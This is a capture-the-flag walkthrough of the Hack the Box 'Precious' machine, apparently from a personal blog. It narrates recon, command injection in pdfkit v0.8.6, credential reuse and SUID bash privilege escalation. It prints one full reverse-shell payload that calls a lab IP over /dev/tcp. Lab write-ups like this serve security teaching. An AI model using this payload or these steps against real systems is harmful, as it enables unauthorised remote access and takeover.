In this post, I would like to share a walkthrough of the Precious Machine from Hack the Box

This room will be considered an Easy machine on Hack the Box

What will you gain from the precious machine?

For the user flag, you will need to abuse the web service which will convert everything on the webpage into a PDF file format. As a result, it has vulnerable to command injection which we will obtain the shell that way

As for the root flag, you need to take advantage of yaml deserialization attack by using the code execution

Information Gathering on Precious Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

Let’s access the website interface

The webpage only shows the interface for converting a Web Page to a PDF file.

Therefore, let’s start our Python server on our attacker machine to monitor how the webpage will response

Let’s enter our IP Address and click the submit button

It look something when trying to inspect the IP Address of our own.

As a result, we managed to retrieve some responses on the Python server

At last, we can see the PDF file as shown above when we try to open it

The PDF file will be a random name where it has no meaning at all.

Let’s try to analyze the PDF file and notice that the creator is been generated by “pdfkit v0.8.6” . The exploit summary can be found on Synk Page

The exploitation code would look something as shown above.

http://darknite.com/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.14.10/443 0>&1"`'}

We should be able to enter some “python” shell command that we can obtain for the reverse shell connection

Boom! We managed to retrieve a reverse shell connection back to us.

We managed to found some credentials for henry which we can take advatanges for user escalation

Finally, we managed to obtain the reverse shell connection back to us as shown above.

We can read the user flag by running the command “cat user.txt”

Escalate to Root Privileges Access

Aside from the user.txt file, we also sighted the dependencies.yml file saved on the directory for some reason.

As usual, we can determine any leak SUID Binary that we can abuse to obtain the Root Privileges Access.

Let’s read the SUID binary file and notice that there is some file.read function on the dependencies.yml file

Let’s execute the command on the victim’s machine

However, we managed to notice that bash has been assigned SUID binary

We can execute the bash -p so that we can escalate to Root Access

At last, I can read the root flag by running the command “cat /root/root.txt”